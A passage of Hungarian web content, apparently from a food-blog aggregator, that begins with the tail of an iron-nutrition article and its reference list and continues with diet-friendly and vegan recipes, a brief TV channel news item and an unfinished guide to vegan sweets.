jelentősen javíthatja a vas felszívódását. A 200 ml narancslében lévő C-vitamin három-négyszeresére növelheti az abszorpciót. - Kis mennyiségű hús növelheti a nem hem vas felszívódását magas fitáttartalmú, alacsony C-vitamin-tartalmú étrend esetén, de a C-vitamin jobban elősegíti a vas felszívódását, mint a hús. - A vasstátusz a hemoglobin és szérumferritin mérésével állapítható meg. - A nyugati társadalmakban alacsony vasszintet és vérszegénységet általában hosszan tartó vagy súlyos vérzés (pl. menstruáció), várandósság vagy a gyermekek esetében a hirtelen növekedés okoz, és nem a rossz táplálkozás. - Túl magas vasszintet okozhat genetikai állapot, nagymértékű vérátömlesztés vagy (ritkábban) vaspótló készítmények túladagolása. - Az alacsony vasszint a leggyakoribb táplálkozási probléma világszerte. Tünetei: fáradékonyság, sápadtság, legyengült immunrendszer, csökkent figyelem-összpontosító képesség. - A veszélyeztetett csoportok közé tartoznak a hat hónaposnál idősebb csecsemők, a kisgyermekek, a serdülők és a várandós nők, valamint az idősek és azok, akik a vas felszívódását gátló élelmiszereket fogyasztanak. A nők menstruációja és a kóros vérveszteség is kockázatot jelent. - A kiegyensúlyozott vegetáriánus vagy vegán étrend ugyanannyi vagy több vasat szolgáltat, mint a húst tartalmazó vegyes étrend. - A vegetáriánusok szervezete hajlamos kevesebb vasat felhalmozni, mint a húsevőké, de a vashiányos vérszegénység nem gyakoribb a vegetáriánusok között. - A mérsékelten alacsonyabb vasszint csökkentheti a krónikus betegségek kockázatát. - A szervezetben lévő túl sok vas mérgező. A tünetek közé tartozik a hányinger, hasi fájdalom, székrekedés és ízületi fájdalom. Májkárosodást, szívelégtelenséget és cukorbetegséget is okozhat. - A túl sok vas növeli a szív- és érrendszeri betegségek, az inzulinrezisztencia és a cukorbetegség kockázatát. - A csecsemők vérszegénységét a túl korai vagy túl késői elválasztás, illetve a tehéntej-allergia következtében fellépő gyomor-bél rendszeri vérzés okozhatja. REFERENCIÁK - Adams, P.C., Kertesz, A.E. and Valberg, L.S. 1991. Clinical presentation of hemochromatosis: a changing scene. American Journal of Medicine. 90, 445-9. - Afkhami-Ardekani, M. and Rashidi, M. 2008. Iron status in women with and without gestational diabetes mellitus. Journal of Diabetes and its Complications. 2008 Jan 4. [Epub ahead of print]. - American Dietetic Association; Dieticians of Canada. 2003. Position of the American Dietetic Association and Dieticians of Canada: Vegetarian diets. Journal of the American Dietetic Association. 103 (6) 748-65. - Armah, C.N., Sharp, P., Mellon, F.A., Pariagh, S., Lund, E.K., Dainty, J.R., Teucher, B. and Fairweather-Tait, S.J. 2008. L-alpha-glycerophosphocholine contributes to meat’s enhancement of nonheme iron absorption. Journal of Nutrition. 138 (5) 873-877. - Baech, S.B., Hansen, M., Bukhave, K., Jensen, M., S?rensen, S.S., Kristensen, L., Purslow, P.P., Skibsted, L.H. and Sandström, B. 2003. Nonheme-iron absorption from a phytate-rich meal is increased by the addition of small amounts of pork meat. American Journal of Clinical Nutrition. 77 (1) 173-9. - Bishnoi, S., Khetarpaul, N. and Yadav, R.K. 1994. Effect of domestic processing and cooking methods on phytic acid and polyphenol contents of pea cultivars (Pisum sativum). Plant Foods for Human Nutrition. 45 (4) 381-388. - BMA, 1986. Diet, nutrition and health. BMA Report 4.11. - Bonsmann (genannt), S.S., Walczyk, T., Renggli, S. and Hurrell, R.F. 2008. - Oxalic acid does not influence nonhaem iron absorption in humans: a comparison of kale and spinach meals. European Journal of Clinical Nutrition. 62 (3) 336-341. - Brune, M., Rossander, L. and Hallberg, L. 1989. Iron absorption and phenolic compounds: importance of different phenolic structures. European Journal of Clinical Nutrition. 43 (8) 547-57. - Bull, N.I., Buss, D.H. 1980. Haem and Non-haem Iron in British Diets. Journal of Human Nutrition. 34, 141-145. - Burke, W., Cogswell, M.E., McDonnell, S.M. and Franks, A. 2000. Public Health Strategies to Prevent the Complications of Hemochromatosis. In: Khoury, M.J., Burke and Thomson, E.J. eds. Genetics and Public Health in the 21st Century: using genetic information to improve health and prevent disease. London: Oxford University Press. - Cook, J.D., Skikne, B.S. and Baynes, R.D. 1994. Iron deficiency. The global perspective. Advances in Experimental Medicine and Biology. l356, 219 -228. - Craig, W. J. 1994. Iron Status of Vegetarians. American Journal of Clinical Nutrition. 59, Supp, p 1233S-7S. - Davey, et al., 2003. EPIC-Oxford: lifestyle characteristics and nutrient intakes in a cohort of 33 883 meat-eaters and 31 546 non meat-eaters in the UK. Public Health Nutrition. 6 (3) 259-69. - Department of Health (1991) Dietary Reference Values for Food Energy and Nutrients for the United Kingdom. London: HMSO. - Fairweather-Tait S.J. 2004. Iron nutrition in the UK: getting the balance right. Proceedings of the Nutrition Society. 63 (4) 519-28. - FSA, 2002. McCance and Widdowsons The Composition of Foods, 6th summary edition. Cambridge, England, Royal Society of Chemistry. - FSA, 2003. Food Standards Agency: Expert Group on Vitamins and Minerals. Safe Upper Levels for Vitamins and Minerals. London: Food Standards Agency. - FSA, 2003a. Henderson, L., Irving, K., Gregory, J., Bates, C.J., Prentice, A., Perks, J., Swan, G. and Farron, M. National Diet and Nutrition Survey: adults aged 19 to 64 years: Vitamin and mineral intake and urinary analytes. London: TSO. Volume 3. - Geissler, C. and Powers, H. eds. 2005. Human Nutrition. 11th ed. [CD-ROM] London: Elsevier Churchill Livingstone. Figure 12.3. - Grantham-McGregor, S. and Ani, C. 2001. A review of studies on the effect of iron deficiency on cognitive development in children. Journal of Nutrition. 131 (2S-2) 649S-666S; discussion 666S-668S. - Hallberg, L., Brune, M., Erlandsson, M., Sandberg, A-S. and Rossander-Hulthen, 1991. Calcium: effect of different amounts on non-heme and heme-iron absorption in humans. American Journal of Clinical Nutrition. 53, 112-119 - Harvey, L.J., Armah, C.N., Dainty, J.R., Foxall, R.J,, John Lewis, D., Langford, N.J., Fairweather-Tait, S.J., Hemalatha, S., Platel, K. and Srinivasan, K. 2005. - Impact of menstrual blood loss and diet on iron deficiency among women in the British Journal of Nutrition. 94 (4) 557-564. - Hemalatha, S., Platel, K. and Srinivasan, K. 2007. Influence of germination and fermentation on bioaccessibility of zinc and iron from food grains. European Journal of Clinical Nutrition. 61 (3) 342-8. - Hemilä, H. and Paunio, M. 2007. Blood donation, body iron stores, and risk of myocardial infarction. Confidence intervals and possible selection bias call study results into question. British Medical Journal. 314 (7097) 1830-1831. - Hua, N.W., Stoohs, R.A. and Facchini, F.S. 2001. Low iron status and enhanced insulin sensitivity in lacto-ovo vegetarians. British Journal of Nutrition. 86 (4) 515-519. - Hunt, J.R., Mullen, L.M., Lykken, G.I., Gallagher, S.K. and Nielsen, F.H. 1990. - Ascorbic acid: effect on ongoing iron absorption and status in iron-depleted young women. American Journal of Clinical Nutrition. 51 (4) 649-655. - Hunt, J.R. 2003. Bioavailability of iron, zinc, and other trace minerals from vegetarian diets. American Journal of Clinical Nutrition. 78 (3) 633S-639S. - Hurrell, R.F., Lynch, S.R., Trinidad, T.P., Dassenko, S.A. and Cook, J.D. 1989. - Iron absorption in humans as influenced by bovine milk proteins. American Journal of Clinical Nutrition. 49, 546-552. - Hurrell, R.F., Reddy, M.B., Juillerat, M.A. and Cook, J.D. 2003. Degradation of phytic acid in cereal porridges improves iron absorption by human subjects. American Journal of Clinical Nutrition. 77 (5) 1213-1219. - Jiang, R., Ma, J., Ascherio, A., Stampfer, M.J., Willett, W.C. and Hu, F.B. 2004. - Dietary iron intake and blood donations in relation to risk of type 2 diabetes in men: a prospective cohort study. American Journal of Clinical Nutrition. 79 (1) 70-75. - Kiechl, S., Willeit, J., Egger, G., Poewe, W. And Oberhollenzer, F. 1997. Body iron stores and the risk of carotid atherosclerosis: prospective results from the Bruneck study. Circulation. 96, 3300-3307. - Kuo, C.S., Lai, N.S., Ho, L.T. and Lin, C.L. 2004. Insulin sensitivity in Chinese ovo-lactovegetarians compared with omnivores. European Journal of Clinical Nutrition. 258 (2) 312-316. - Leitzmann C., 2005. Vegetarian diets: what are the advantages? Forum on Nutrition. (57) 147-156). - Marero, L.M., Payumo, E.M., Aguinaldo, A.R., Matsumoto, I. and Homma, S. 1991. The antinutritional factors in weaning foods prepared from germinated legumes and cereals. Lebensmittelwissenschaft Technol. 24, 177-81. - Meyers, D.G., Strickland, D., Maloley, P.A., Seburg, J.K., Wilson, J.E. and McManus, B.F. 1997. Possible association of a reduction in cardiovascular events with blood donation. Heart. 78, 188-193. - Monsen, E.R. 1988. Iron nutrition and absorption: dietary factors which impact iron bioavailability. Journal of the American Dietetic Association. 88 (7) 786-90. - Nävert, B., Sandström, B. and Cederblad, A. 1985. Reduction of the phytate content of bran by leavening in bread and its effect on zinc absorption in man. British Journal of Nutrition. 53 (1) 47-53. - Nelson, M. and Poulter, J. 2004. Impact of tea drinking on iron status in the UK: a review. Journal of Human Nutrition and Dietetics. 17 (1) 43-54. - NHS Direct, 2008. Haemochromatosis [online]. Available from: www.nhsdirect.nhs.uk/articles/article.aspx?articleId=2521§ionId=1 [Accessed May 1 2008]. - Oberley, L.W. 1988. Free radicals and diabetes. Free Radicals Biology and Medicine. 5, 113-124. - Oski, F.A. 1996. Dont Drink Your Milk. New York: TEACH Services Inc. Salonen, J.T., Nyyssönen, K., Korpela, H., Tuomilehto, J., Seppänen, R. and Salonen, R. 1992. High stored iron levels are associated with excess risk of myocardial infarction in eastern Finnish men. Circulation. 86 (3) 803-811. - Sempos C.T. 2002. Do body iron stores increase the risk of developing coronary heart disease? American Journal of Clinical Nutrition. 76, 3, 501-503. - Sharma, D.C. and Mathur, R. 1995. Correction of anemia and iron deficiency in vegetarians by administration of ascorbic acid. Indian Journal of Physiology and Pharmacology. 39 (4) 403-406. - Sharp, P. 2005. Minerals and trace elements. In: Geissler, C. and Powers, H. eds. Human Nutrition. 11th edition. London: Elsevier Limited, 240. - Sullivan, J.L. 1981. Iron and the sex difference in heart disease risk. Lancet. 1(8233) 1293-1294. - Temme, E.H. and Van Hoydonck. P.G. 2002. Tea consumption and iron. European Journal of Clinical Nutrition. 56 (5) 379-86. - Tuomainen, T-P., Salonen, R., Nyyssonen, K. and Salonen, J.T. 1997. Cohort study of relation between donating blood and risk of myocardial infarction in 2682 men in eastern Finland. British Medical Journal. 314, 793-794. - Viadel, B., Barberá, R. and Farré, R. 2006. Calcium, iron and zinc uptakes by Caco-2 cells from white beans and effect of cooking. International Journal of Food Science and Nutrition. 57 (3-4) 190-197. - Willetts, I.E., Dalzell, M., Puntis, J.W. and Stringer, M.D. 1999. Cows milk enteropathy: surgical pitfalls. Journal of Pediatric Surgery. 34 (10) 1486-8. - Wolff, S.P. 1993. Diabetes mellitus and free radicals. Free radicals, transition metals and oxidative stress in the aetiology of diabetes mellitus and complications. British Medical Bulletin. 49, 642-652. - Yang, R-Y., Tsou, S. T. S., and Lee, T-C. 2002. Effect of cooking on in vitro iron bioavailability of various vegetables. In: Lee T-C. and Ho C-T. eds. Bioactive compounds in foods, effects of processing and storage. ACS Symposium Book Series 816. American Chemical Society. 130-142. - Zheng, H., Cable, R., Spencer, B., Votto, N., Katz, S. D. (2005). Iron Stores and Vascular Function in Voluntary Blood Donors. Arteriosclerosis, Thrombosis, and Vascular Biology. 25: 1577-1583. - Ziegler, E.E., Fomon, S.J., Nelson, S.E., Rebouche, C.J., Edwards, B.B., Rogers, R.R. and Lehman, L.J. 1990. Cow milk feeding in infancy: further observations on blood loss from the gastrointestinal tract. The Journal of Pediatrics. 116 (1) 11-8.
csokipudingos-túrós rétes
2018. február 22. Beautilicious
Hogy is képzelhetnénk el a nassolást rétes nélkül? Sehogy! Még a diéta alatt sem maradhat ki egy igazi magyar étrendjéből a rétes. Klasszikus, és örök kedvenc :) Hozzávalók - 100gr barnarizs liszt - 150ml szénsavas víz - egy csipet só - 3 tojás - 200gr túró - 40gr kakaópor - 40+40gr édesítőszer - 200ml folyadék - 30gr kókuszreszelék - 1 citrom leve Így készítsd - A tojásfehérjét szénsavas vízzel, csipet sóval, és a liszttel keverjük össze. Palacsintatészta állagot fogunk kapni. - Ezt öntsük tepsibe, és süssük 10percig - A töltelékhez készítsünk csokipudingot a megszokott módon ( felfőzzük a folyadékkal a tojássárgáját, édesítőt, kakaóport) - A túrós töltelékhez a túrót kikeverjük édesítőszerrel, és citromlével. An kókuszreszeléket is tettem bele, mert imádom :D - Megtöltjük a tésztát, és feltekerjük, majd sütjük 30percig
Pagoda saláta
Avagy csodálkozzunk rá a természet egyik nagy titkára
Van abban valami leírhatatlanul igéző, ahogyan a pagodakarfiol mintája ütemesen gyűrűzik. Valósággal hipnotizál, ha követhetjük a spirált egyre beljebb és beljebb, bármeddig zoomolhatunk, ugyanazzal az alakzattal találkozunk, csak egyre kisebben. Valóságos csoda ez a növény!
Amikor rózsákra szedtem ezt a karfiolt, végre megértettem, hogy mi az a fraktál. Kezembe akadt a két legnagyobb piramis, az egyik a fej aljáról a legnagyobb, a másik meg a karfiol felső csúcsa. Mit ad isten, egymás szakasztott másai voltak! És ahogy tovább néztem, mindegyik kis rücsök is szakasztott mása volt a rózsáknak, sőt, az egész karfiolnak is. Zavarba ejtő egy jelenség ez, a természet egyik remekműve.
Még egy okból bámulatos a pagodakarfiol, és ezek az arányai, mert benne minden az úgynevezett aranymetszés szabályát követi. Ez a kedves arány benne van még a kövirózsában, a hópehelyben, a csigaházban, a napraforgó fejében, a kaméleon farkában, az örvény vagy a káposztafej tekeredésében, a toboz rajzolatában, sőt, a páfrány vagy a folyótorkolat erezetében is. Nézd, milyen hihetetlenül gyönyörűek egytől egyig.
Elméláztál? :) Nem vagy egyedül. Nincs ember, aki ne találná harmonikusnak az aranymetszés látványát, úgy belénk van kódolva. Ezért sokszor ezt az arányt használják a művészek is, ha valami igazán lélegzetelállítót akarnak alkotni, pl. Leonardo és Michelangelo művei, a Partnenon egyes részei és a Szent Korona is… Bizony.
Na, de vissza a konyhádba. Jöjjön a recept, ami a tányéron már nem fog ennyi alkalmat adni a merengésre meg hosszú vizsgálódásra. Ilyesmire nem lesz idő. :)
Az aranymetsző fraktálokat kéretik tálalás előtt megvizsgálni.
Hozzávalók egy tálhoz:
- 1 fej pagodakarfiol
- fél kaliforniai paprika
- 1 szál újhagyma
- 3 kk magos dijoni mustár
- 1 mk só
- 1 citrom reszelt héja – jó lesz bele, ne félj tőle. ;)
- fél citrom leve
- 2 ek olívaolaj
- 1 ek aprított kapor
- A karfiolt szedjük rózsáira, és dobjuk bő, lobogó vízbe. Három perc főzés után szűrőkanállal szedjük ki. Tálcán terítsük el, hogy gyorsan ki tudjon hűlni.
- Közben vágjuk kockára a paprikát és karikázzuk fel az újhagymát.
- Készítsük el az öntetet is. Egy kisebb tálban keverjük ki a mustárt a sóval, a citromlével, a citromhéjjal, majd kevergetés közben csurgassuk bele az olajat.
- Egy nagyobb tálban forgassuk össze mindent, végül szórjuk meg aprított kaporral.
Jó étvágyat!
Elkészítési idő: 10 perc
Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még.
Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :)
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat is:
Kezdő Vegán
Vegán MUST HAVE – a kötelező alapcsomag
Növényi Tejek és Tejtermékek I
Növényi Tejtermékek II
A Mindennapi Superfood
Kezdő Vegán Angol nyelven
The post Pagoda saláta appeared first on Kertkonyha.
fahájas sajtkrémes muffin
2018. február 17. Beautilicious
Sajttorta, és muffin...nyamiii! Mindkettő nagy kedvenc. Na de akkor melyiket válasszam? Legyen mindkettő :D hozzávalók - 130gr hajdina liszt - 20gr bambuszrost liszt - 75gr tejföl - 400gr répa - 50+35gr édesítő - 3tojás - fahéj - 2000gr sajtkrém - sütőpor így készítsd - főzd meg a répát - keverd össze a liszteket az 50gr édesítőszerrel, sütőporral fahéjjal, 2tojással, és tejföllel - ha kész a répa, alaposan turmixold össze a keverékkel - A sajtkrémet keverd össze 1 tojással és édesítőszerrel - A masszát adagold muffin formába, majd öntsd le sajtkrémmel, majd mehet rá még egy kis massza - süsd 180 fokon 30percig
Mángoldos – bokkolis subji – indiai zöldséges főétel
2018. február 15. Eszemiszom – Jóga Magazin
Ezt a subjit gyakran készítem, és képes vagyok több nap egymás után is újra és újra megcsinálni. Imádom ezeknek a zöldségeknek az ízkombinációját és a látványát is:)
Hozzávalók
3 ek. ghí ( vegán változatban kókuszzsír)
1 nagy édeskömény
1 nagy fej brokkoli
1 csokor mángold
1 kk. római kömény
1 kk. édeskömény
0,5 ek örölt koriander
1 kis db gyömbér
csipet kurkuma
só
Vegyszermentes (bio) alapanyagokat használj!
A brokkolit szedd rózsáira, mosd meg és a rózsákat vág félbe – ha nagyon nagyok 3 vagy 4 részre, emrt így pont együtt készül majd el a többi zöldséggel:). Az édesköményt mosd meg és vágd darabokra. A mangoldot szedd leveleire mosd meg és azt is vágd kisebb darabokra. Én először középen vágom félbe és utána keresztbe.
A zsiradékot tedd egy forró edénybe. Tedd bele a római köményt és az édesköményt és pirítsd egy rövid ideig. Add hozzá a gyömbért, koriander és pirítsd őket néhány percig, majd tedd bele a kurkumát. Tedd hozzá a zöldségeket és.tegyél hozzá egy kis vizet, keverd meg és fedd le úgy, hogy egy kis rés maradjon. Néha kevergesd és addig párold, amíg a zöldségek megpuhulnak.
Rizzsel, chapati kenyérrel, quinoával vagy bármilyen gabonával tálalhatod. A végén locsold meg olívaolajjal vagy napraforgóolajjal.
Kókuszos vaníliapudingos sajttorta
2018. február 10. Beautilicious
Bár a sütés végére a konyha romokban állt, a süti íze kárpótolt mindent, és remélem itthon anyáékat is :D. Könnyű krémes cukor, liszt, és bűntudatmentes sütemény Hozzávalók - 150gr kókuszreszelék - 500gr alma pürésítve - 250ml folyadék - 3 tojás - sütőpor - fél citrom leve - 250gr sajtkrém - 100gr görög joghurt - 1csomag vaníliás pudingpor - 5ek édesítőszer - 400ml tejÍgy készítsd - A tésztához keverjük össze a kókuszreszeléket 3 tojás sárgájával, almapürével, 300ml folyadékot, citromlével, és a sütőporral - Tedd a tésztát magasfalú tepsibe, és süsd elő 170 fokon 20percig - A krémhez főzd meg a pudingot a tejben édesítőszerrel - Ha langyos keverd össze a joghurttal, és a sajtkrémmel - Verd fel a tojásfehérjét, és óvatosan keverd a pudinghoz - öntsd rá a tésztára, és süsd 40-45 percig
Mángoldos - brokkolis subji - indiai zöldséges főétel
2018. február 8. Élj harmóniában
Ezt a subjit gyakran készítem, és képes vagyok több nap egymás után is újra és újra megcsinálni. Imádom ezeknek a zöldségeknek az ízkombinációját és a látványát is:) Hozzávalók 3 ek. ghí ( vegán változatban kókuszzsír) 1 nagy édeskömény 1 nagy fej brokkoli 1 csokor mángold 1 kk. római kömény 1 kk. édeskömény 0,5 ek örölt koriander 1 kis db gyömbér csipet kurkuma só Vegyszermentes (bio) alapanyagokat használj! A brokkolit szedd rózsáira, mosd meg és a rózsákat vág félbe - ha nagyon nagyok 3 vagy 4 részre, emrt így pont együtt készül majd el a többi zöldséggel:). Az édesköményt mosd meg és vágd darabokra. A mangoldot szedd leveleire mosd meg és azt is vágd kisebb darabokra. Én először középen vágom félbe és utána keresztbe. A zsiradékot tedd egy forró edénybe. Tedd bele a római köményt és az édesköményt és pirítsd egy rövid ideig. Add hozzá a gyömbért, koriander és pirítsd őket néhány percig, majd tedd bele a kurkumát. Tedd hozzá a zöldségeket és.tegyél hozzá egy kis vizet, keverd meg és fedd le úgy, hogy egy kis rés maradjon. Néha kevergesd és addig párold, amíg a zöldségek megpuhulnak. Rizzsel, chapati kenyérrel, quinoával vagy bármilyen gabonával tálalhatod. A végén locsold meg olívaolajjal vagy napraforgóolajjal.
Brokkoligolyók kókuszbundában
Leggyakrabban édességekhez használjuk a kókuszreszeléket. Ez általános. Nagy ritkán mégis megszáll valami, ami által kísérleteket viszek véghez. Így jött létre ez a kókuszreszelékbe forgatott brokkoli golyó. Ha van maradék párolt brokkolid, vagy nem tudod, mit kezdj a hűtőben pihenő brokkoliddal, íme egy jó kis recept. Mi zöldséges rizzsel és vegán majonézzel fogyasztottuk. Kellemes ízélmény ezek együttese.
A recept
Hozzávalók:
- 400 g brokkoli
- 0.5 fej vöröshagyma
- 1 gerezd fokhagyma
- zabpehely
- 2 ek sörélesztő pehely
- kókuszreszelék
- só
Elkészítés:
A brokkolit megmossuk, és a rózsáira szedjük. Kevés sós vízben feltesszük párolni kb. 10-15 percig. A vöröshagymát, fokhagymát felaprítjuk. Amikor félig megpuhult a brokkoli, hozzáadjuk a felaprított hagymát és a fokhagymát. Botmixerrel vagy gyorsaprítóval összeturmixuljuk úgy, hogy maradjanak benne darabok. Hozzákeverünk annyi zabpelyhet, hogy formázható masszát kapjunk. Adunk hozzá sót és sörélesztő pelyhet, majd gombócokat formálunk belőle. A gombócokat pedig meghempergetjük kókuszreszelékben. Sütőpapíros tepsire helyezzük és kb. 15-20 perc alatt készre sütjük. Rizibizivel és vegán majonézzel fogyasztottuk.
mákos háromszög
2018. február 3. Beautilicious
Fehérje, rost, jó szénhidrátok, finom íz és egészség egy sütiben. hozzávalók - 40gr útifűmag héj - 40+40gr édesítő - 100gr zabliszt - 60gr búzasikér - 100ml forró víz - 2 tojás töltelék - 60gr mák - 150ml tej így készítsd - keverd össze a száraz hozzávalókat a tojásokkal - öntsd rá a forró vizet, és gyúrd össze a tésztát - a töltelékhez főzd össze a tejben a mákot az édesítővel - formázz négyzeteket a tésztából, töltsd meg, majd hajtsd félbe - süsd ki 180 fokon 20 perc alatt
Alábundázat:) téli finomságok Spenótos pakora édes-sima burgonyapürével
2018. január 27. Eszemiszom – Jóga Magazin
Alábundázat:) téli finomságok
Spenótos pakora édes-sima burgonyapürével
Hozzávalók 2 személyre:
200 gr spenót
1 nagy répa
1 közepes fej édesburgonya
1 kisebb fej fehér krumpli
1,5 pohárnyi besan, vagy csicseriborsóliszt
fűszerek: só, bors, kömény, őrölt koriander, chili, garam masala
A spenótleveleket jó alaposan meg kell mosni. Leszedni a szárukat, a szálas részeket. Összevágom apróra. Összekeverem a leszerelt répával, sózom, borsozom. Külön tálban összekeverem a besant a többi fűszerrel, abba is mehet kicsi só ízlés szerint. Vízzel a ragacsos, kissé folyós tésztát higítok belőle és összekeverem a zöldségekkel.
Közben a krumplikat felteszem sós vízben főni. Ha megfőttek, miután leöntöm a levét, egyszerűen szétnyomom őket krumplinyomóval pürének. Díszítésnek mehet rá koriander vagy petrezselyem zöldje.
A zöldsgéges masszát kanállal jó forrón sistergő olajba szaggatom és kisütöm. Ennyi.
Nagyon laktató!
Ebben a formátumban tökéletes ebédre, vacsorára is. Ha könnyíteni szeretnénk, akkor lehet hozzá sima joghurtos mártást enni.
csokipudingos párna
2018. január 22. Beautilicious
Szerintem nincs olyan, aki ne rajongana a csokipudingért, de a bolti tele van aromákkal, keményítővel. Inkább készítsük el otthon, és koronázzuk meg vele a reggelt Hozzávalók - 75gr zabliszt - 2 tojás - 150gr joghurt - 100ml+150ml tej - 2ek kakaó - édesítő - sütőpor Így készítsd - A tojásokat válaszd ketté - A sárjáját tedd lábasba - Add hozzá a tejet, édesítőt, kakaóport, és főzd, míg pudig állagú nem lesz - A fehérjét verd kemény habbá édesítővel - Keverd össze a lisztet a sütőporral - Add hozzá a 100ml tejet, joghurtot, majd a felvert habot - Süsd ki kivajazott melegszendvics sütőben, úgy, hogy a közepébe teszel egy kanál pudingot
fahéjas briós
2018. január 12. Beautilicious
Egy igazi nagy kedvenc fahéjjal megspékelve, diétásan. Hozzávalók - 30gr bambuszrost liszt - 70gr búza sikér - 100gr zabliszt - 1 tojás - 60gr édesítő - 30gr vaj vagy kókuszzsír - 200ml tej - méz - 20gr élesztő - fahéj Így készítsd - Futtasd fel az élesztőt a mézzel, és a tejben - Keverd össze a hozzávalókat, majd dagasztd a tésztát - Tedd félre kelni 1 órára - Oszd 10 részre a tésztát, majd nyújts belőle hosszúkás rudakat - Tekerd fel, mint a csigát - Helyezd tepsibe, majd szórd meg édesítővel - Süsd 170 fokon 20 percig
Majonézes almás zellersaláta dióval
2018. január 3. Gitta nyersétel blogja
A hagyományos majonézes saláták közül néhányat a nyerskonyhában is el lehet készíteni, majonézes kukorica saláta, cékla vagy borsósaláta... de talán a legizgalmasabb ez az almás zellersaláta nyers majonézzel. Kifejezetten téli étel, az alma, a dió és a zeller édes-hármasa teszi különlegessé. Hozzávalók 4 adaghoz 18 dkg zellergumó tisztítva mérve 12 dkg zellerszár 15 dkg alma egy marék áztatott, szárított dió Majonéz: 15 dkg kesudió 10 dkg alma só, citromlé, víz Előkészítés: a diót beáztatjuk tiszta vízbe kb 10 órára, majd sütőben vagy aszalógépben teljesen kiszárítjuk. Elkészítjük a majonézt: a kesudiót a hámozott, tisztított almával, kevés vízzel és az ízesítőkkel simára turmixoljuk. Elkészítés: a zellergumót gyufaszál vékony csíkokra, a zellerszárat vékony szeletekre vágjuk, az almát lereszeljük nagylyukú reszelőn. A darabos részt összekeverjük a majonézzel. Tálaláskor a tetejét megszórjuk összemorzsolt dióval.
mákos guba kocka
2017. december 30. Beautilicious
Igazi magyar klasszikus, és mindenki nagy kedvence a mákos guba. Te se maradj ki belőle, készítsük el egészségesen! Imádni fogod! hozzávalók - 150gr köles - 35gr mák - 40gr + 2ek édeszítőszer - 3 tojás - 1 citrom héja és leve - vaníliaaroma így készítsd - Főzd meg a kölest vaníliás vízben, vagy tejben ízlés szerint - A tojásokat válasszuk ketté - A sárgáját adjuk a köleshez - A fehérjét verjük habbá 2ek édesítővel - Adjuk a mákot,és az édesítőt a köleshez - Öntsük a masszát a tepsibe, majd Kanalazzuk rá a tojásfehérjét - Tegyük be 180fokon a sütőbe, míg aranybarna nem lesz a fehérjehab
Ravasz trópusi nevet kap újévtől Andy Vajnáék főzőcsatornája
Édes trópusi gyümölcsre cserélik a trópusi fűszernövényt újévtől a TV2 Csoport főzőcsatornájának nevében, hogy eleget tegyenek a bíróság nemrég jogerőssé vált határozatának a névvita ügyében.
narancsos kókuszos mini palacsinta
2017. december 17. Beautilicious
Nincs is jobb dolog a hétvégi reggelinél. Mikor reggel a konyhába és megláttam a pulton a narancsokat, egyből tudtam, hogy mi lesz a sorsuk. Nagyon jó helyre kerültek :D Hozzávalók - 65gr kölesliszt - 15gr bambuszrostliszt - 35gr kókuszreszelék - 40gr édesítőszer - fél csomag kakaópor - 2 narancs kifacsart leve - 150gr túró - 50 ml kókusztej - kókuszolaj a sütéshez Így készítsd - Törd össze a túrót, és keverd össze a tejjel, és a narancslével - Keverd össze a száraz hozzávalókat, majd öntsd hozzá a túrós keveréket - Gyúrd össze alaposan - Forralj fel egy kis kókusz olajat a serpenyőben, majd süsd ki a palacsintákat
citromos mákos keksz
2017. december 14. Beautilicious
Hamarosan itt a karácsony, jönnek a vendégek, és majszolják a sok finomságot. Te sem maradhatsz süti nélkül! Itt az egyik kedvenc, cukor, glutén és tojásmentes keksz receptem, amit te is biztosan imádni fogsz. Hozzávalók - 150gr kölesliszt - 30gr bambuszrost liszt - 50gr mák - 50gr édesítőszer - 1 citrom héja és leve - 1tk szódabikarbóna - 125gr joghurt - 50ml kókusztej Így készítsd - Keverd össze a száraz alapanyagokat - Reszeld le a citrom héját, majd facsard ki és öntsd a lisztes keverékhez - Add hozzá a többi hozzávalót is, majd gyúrd össze - Süsd ki 180fokon 30perc alatt
Mi kerüljön a vegán mikuláscsomagba?
A szülők és nagyszülők gyakran tanácstalanul állnak az édességes polcoknál december elején, ha vegán szerettüknek szeretnének összeállítani egy édességcsomagot, például mikulásra. Valljuk be, sok egyéb feladat mellett ez is sajnos még mindig inkább a nagyikra és anyukákra hárul. Nekik segíthet ez a kis összeállítás. Ha biztosra akarunk menni, akkor válasszuk a képen látható vegán édességeket, de jó megoldás az is, ha elolvassuk a termékcímkét. Persze ehhez nem árt tudnunk, hogy melyek a nem vegán összetevők a tejen, tojáson, mézen, állati zsiradékokon kívül. Ilyen például a méhviasz, amit cukrok, gumicukrok és rágógumik bevonatánál használnak. A zselatint állati csontokból vonják ki, és a legtöbb gumicukor alapja. A kármint piros színéért használják, és bíbortetűből készül. A tejpor, tejsavópor, tejzsír nevében benne van a tej szó, így ezeket könnyebb kiszúrni, VISZONT a tejsavat baktériumok állítják elő, így utóbbi nem állati eredetű. A sellak a lakktetű váladékából készül, szintén nem vegán. A propiliszt és a virágport elég kevés édességben találjuk meg, de mivel méhek kihasználásával szerzik be, szintén nem vegán. A pálmaolajról megoszlanak a vélemények, mindenesetre jobb fenntartható gazdálkodásból származó pálmaolajat használni, illetve olyan termékeket venni, amelyekben csak ilyet használnak. Fit Bio müzliszelet – 159 Ft Háromféle ízben kapható, málnás, almás és sárgabarackos ízekben. MaBaker Giant Bar Zabszelet – 299 Ft Sokféle ízben kapható, és nem mind vegán. A sima gyümölcsösek és a földimogyorós, pisztáciás, kókuszos, pekándiós biztosan vegán. A joghurtosak viszont nem! Aszalt gyümölcsök – 300 Ft-tól Rengetegféle közül lehet válogatni a boltok polcain, egyetlen dologra kell odafigyelni: ne legyen mézes, vagy csokiba mártott. Utóbbi esetben ugyan csak a tejcsoki és a fehércsoki nem vegán, az étcsokis sok esetben az, de érdemes elolvasni a címkét. Olajos magvak – Mindenféle árban lehet kapni őket, zacskózva, kimérve, keverve, sósan, só nélkül… Gyakran pálmaolajjal pirítják őket, így erre itt is érdemes odafigyelni. Csokis nápolyi – 549 Ft Sok vegán kerüli a pálmaolajat is etikai okokból, de ebben a nápolyiban fenntartható gazdálkodásból származó pálmaolaj van, amivel biztosan nem lesz problémája az ajándékozottnak! Étcsoki – 699 Ft Nem feltétlenül kell ennyire drága étcsokoládét vennünk, ez egy magas minőségű fajta, de lejjebb még lesznek alternatívák. A Rapunzel Choco egy vegán csokikrém, hasonlít a nutellára, de étcsokisabb ízű. – 1249 Ft Fenntartható forrásból származó pálmaolaj van benne, így 